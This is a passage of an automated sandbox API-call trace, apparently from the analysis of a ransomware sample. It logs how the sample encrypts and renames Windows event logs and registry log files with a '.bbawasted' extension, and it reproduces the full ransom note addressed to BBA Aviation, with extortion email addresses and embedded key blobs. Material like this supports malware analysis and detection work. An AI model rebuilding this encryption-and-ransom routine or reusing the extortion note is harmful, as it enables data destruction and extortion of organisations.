pbBuffer=0x6bb6f0) returned 1 [0200.819] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0200.819] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx.bbawasted_info" (normalized: "c:\\logs\\setup.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0200.820] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0200.821] SetEndOfFile (hFile=0x28c) returned 1 [0200.821] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.821] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0200.821] lstrcpyW (in: lpString1=0x6ae5c4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0200.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Setup.evtx.bbawasted" (normalized: "c:\\logs\\setup.evtx.bbawasted")) returned 1 [0200.822] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx.bbawasted" (normalized: "c:\\logs\\setup.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0200.822] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0200.823] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0200.823] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0200.823] CloseHandle (hObject=0x280) returned 1 [0201.083] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0201.083] CloseHandle (hObject=0x294) returned 1 [0201.083] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0201.084] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0201.084] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0201.084] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0201.084] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0201.085] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0201.085] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0201.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0201.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0201.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.097] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lLcuDl65WvOeaoinVWHXZvUodyMEYbek/x6NaJk9wpEfq8RmWc9bHvQdO0Y1lH1d\r\nTfclc9zSXMlJhzASohbBk6nNPEQ4FGNnXUr5dbOImcA3EZU6aVBxvvc0XUk3l387\r\np0BxunEUDDaxBYabUxvIOiMhxLlkS17DIzxtgH5bIDkeoT7oF6m5syAIo0ZGbrXu\r\nfz7xNh1vTUOorjFmBdJTlUDluL01toifTf8/rv2GFFbMYBPdhOOaKcN8z0XZl4PX\r\n4IfkfiFc7huA9dsjbQ4Ol7mstHe6HpykN6Ir7F9z1U0xoNbs+ChJgNZfkvBAJlmh\r\nUMJLzDpD6m7Dfx4p1BckSYRLapUoni3gv4ns8I77TqC1nQ6OqK5HILwiahthlrX8\r\n9LduoeWVt2as4Gwi5HEvFcmgBE+T0tfMDkPpVLD7lDFZW99AvxyTKYz9i5VB7ByQ\r\npWXSPbQLZarsoHVApWwy8AJ+bWfMdvf/+9p8Ye0d8A/Mk1Xg/oWeMwmDdX28CYZI\r\nX129Ksn9j4ee/IchI3OM1k4jHWztqYxSk4cMHo1yTYrPBUKX51KnW3lLCTUkfNWo\r\naZO7VADxKra7IwSSa91DeBHDORcmIZoHT/XZHwtl6gk+j230+0qgxecAuZ+B+Z28\r\n2/2fe2TXi+yQE7mKwx1x/MTgkHHVQZv0UiGVYzTcUlL=[end_key]\r\nKEEP IT\r\n") returned 984 [0201.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0201.097] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0201.097] SetEndOfFile (hFile=0x28c) returned 1 [0201.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.100] CloseHandle (hObject=0x28c) returned 1 [0201.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0201.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a08a0 | out: hHeap=0x660000) returned 1 [0201.113] _aulldvrm () returned 0x0 [0201.114] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0201.114] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0201.114] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0201.114] lstrlenW (lpString="\\\\?\\C:\\Logs\\System.evtx") returned 23 [0201.114] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x238) returned 0x6ae598 [0201.115] lstrcpyW (in: lpString1=0x6ae5c6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0201.115] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.115] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0201.115] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0201.115] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0201.115] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx.bbawasted_info" (normalized: "c:\\logs\\system.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0201.116] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0201.117] SetEndOfFile (hFile=0x28c) returned 1 [0201.118] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.118] lstrcpyW (in: lpString1=0x6ae5c6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0201.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\System.evtx.bbawasted" (normalized: "c:\\logs\\system.evtx.bbawasted")) returned 1 [0201.331] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx.bbawasted" (normalized: "c:\\logs\\system.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0201.331] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0201.332] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x111000 [0201.332] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x111000) returned 0x41a0000 [0201.332] CloseHandle (hObject=0x294) returned 1 [0201.541] UnmapViewOfFile (lpBaseAddress=0x41a0000) returned 1 [0201.662] CloseHandle (hObject=0x280) returned 1 [0201.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0201.662] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0201.663] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0201.663] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0201.663] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0201.664] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0201.664] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0201.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0201.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0201.711] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.711] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]n0XvfwIKvwySKhjlejHs5vzW9hAWNx6sAz7jS35unG3ZLTKu6r71myTfLD8xpfH9\r\nVGFlf79zfih7RfkhsjxYTJ2JgEb4zQo/XskcDzurrBseKhVbdAwdmzKC6qRTWe26\r\nD3de2otJWypFOZvvKl+dtrzoZrhSrJTg5Lug1oflnA7uCPwAzO3eIA93Tp54+pUn\r\nGaFfEJ7Pt+VCcR6FvuzwvsSz2M92q5O5CeJSNQY4s2CMMwbhtlnxX77D6MMaz+3T\r\nTq2nPfSvyzqgKlyJuF0fDxd/DE9RPdScntpDP8gq4B3V4DLqhNA3ze/YeIjR2ZWP\r\n1PwYqn6urB8VIqKUTPLloN62sm9uwk5Qzy1Ck1luz/N9oyO5GRfoqBPMDH/Zfdvx\r\nsD7UtdoD+W7WcIqEEoTJogLki+FmXv7HCoIbeHHOy1LWZ08nY1WzrSxIp5HiCdGQ\r\nuRVVZWzg6dH6Al7mHDs0MLZj6FWyXlVA5tUD71rkb1UR5aWU3ONob3rjIc4wWaOS\r\nXdl95zV/5CNuGamhHhxfbBLFcANien/xJ0BfImaAHEOmAilGx7jhx+q/cJag086u\r\njnYbc/SjBe/4RItkAUuWRmpNGszEkQ2iMe/QgH4qenXViJFvJQ/InaOHEDJdBR0+\r\n1Wq+2YdyBz4uW1tzqaT8nWI67aGIP1qHWlWdb7QuMl0=[end_key]\r\nKEEP IT\r\n") returned 984 [0201.711] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0201.711] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0201.711] SetEndOfFile (hFile=0x28c) returned 1 [0201.714] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.714] CloseHandle (hObject=0x28c) returned 1 [0201.718] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0201.718] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0420 | out: hHeap=0x660000) returned 1 [0201.718] _aulldvrm () returned 0x0 [0201.718] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0201.719] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0201.719] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0201.719] lstrlenW (lpString="\\\\?\\C:\\Logs\\Windows PowerShell.evtx") returned 35 [0201.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x6c4150 [0201.722] lstrcpyW (in: lpString1=0x6c4196, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0201.722] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.723] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0201.723] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0201.723] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0201.723] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.bbawasted_info" (normalized: "c:\\logs\\windows powershell.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0201.724] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0201.725] SetEndOfFile (hFile=0x28c) returned 1 [0201.725] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.725] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.725] lstrcpyW (in: lpString1=0x6c4196, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0201.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.bbawasted" (normalized: "c:\\logs\\windows powershell.evtx.bbawasted")) returned 1 [0201.726] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.bbawasted" (normalized: "c:\\logs\\windows powershell.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0201.726] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0201.726] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0201.726] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0201.726] CloseHandle (hObject=0x280) returned 1 [0201.735] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0201.735] CloseHandle (hObject=0x294) returned 1 [0201.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0201.735] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f98) returned 1 [0201.865] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0201.865] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0201.865] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0201.866] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0201.866] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0201.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0201.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0201.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.878] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kteK2XcHdUn2n1r9E/2WtBy8csuky4gXTHhibjc2ivIWmxG2ROdkdtOUsd8SKrr4\r\nMtq9R+8s29evO+3jSKAXWmClMRd51ei0i014rsrMOkkPOtVo0114yRpdxT7HOoML\r\n9QEKMG1E69nrF+dF5skEjm/gO5oUeeaPeY90y1bEYQ+kqQX2DAVxZDz6vDmkaBhy\r\nnj0sEP9psTOW3n9zbF/Wv41p1bSfI3R3IdGQil/lEuJqAIum8jpfdY4Bs/TLy71p\r\nex81B1htOCz6eticG8qkbBYhcsCvfb4pdnW75du6aCtgStFA/ecjhKO23v3mzYQQ\r\nWOYUl5ka7pE9iFNIkyGhjzDCzGX/VKR6Da1TJFSgzol7KAnOaGR/bd8T2/fFAkSR\r\nsBezLb+rLy8kxmgk3bTsPVCVoclSQktv3Lpbrc3BdvY85NWrKornxf63wxNyMGPd\r\ntThmE7UpxQzc7hVpYptU5m2m6JL/HqllNmt5aWvUam+mFfBxvOT7/1oJY9DmLybP\r\nJoqkPr91ohH+yMzj4imiqEJ1cGw2oum6qFmm55TsWF7FCXKK7wY5bESvU21U2Ih0\r\n6MCyYmS+QhU4o3TY3Zzr6ABarOsToFRD0ytXVdXv5vr/YNfR2qyzcbid8NWo1/2U\r\nJH0xD40eWOtpW4MRcApu3B//O3ktRXPiKrGIn1uCaCm=[end_key]\r\nKEEP IT\r\n") returned 984 [0201.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0201.878] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0201.878] SetEndOfFile (hFile=0x28c) returned 1 [0201.881] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.881] CloseHandle (hObject=0x28c) returned 1 [0201.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4150 | out: hHeap=0x660000) returned 1 [0201.884] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a04a8 | out: hHeap=0x660000) returned 1 [0201.884] _aulldvrm () returned 0x0 [0201.884] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0201.885] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0201.885] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0201.885] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0201.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x252) returned 0x6c4b88 [0201.885] lstrcpyW (in: lpString1=0x6c4bd0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0201.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0201.885] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6130) returned 1 [0201.886] CryptGenRandom (in: hProv=0x6a6130, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0201.886] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0201.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.bbawasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log2.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0201.887] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0201.889] SetEndOfFile (hFile=0x28c) returned 1 [0201.889] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0201.889] lstrcpyW (in: lpString1=0x6c4bd0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0201.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log2.bbawasted")) returned 1 [0201.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.bbawasted" (normalized: "c:\\users\\default\\ntuser.dat.log2.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0201.890] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0201.890] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x5000 [0201.890] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5000) returned 0x640000 [0201.891] CloseHandle (hObject=0x294) returned 1 [0201.896] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0201.896] CloseHandle (hObject=0x290) returned 1 [0201.896] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0201.896] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0201.897] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0201.897] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0201.897] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0201.898] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0201.898] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0202.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0202.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0202.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0202.145] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED 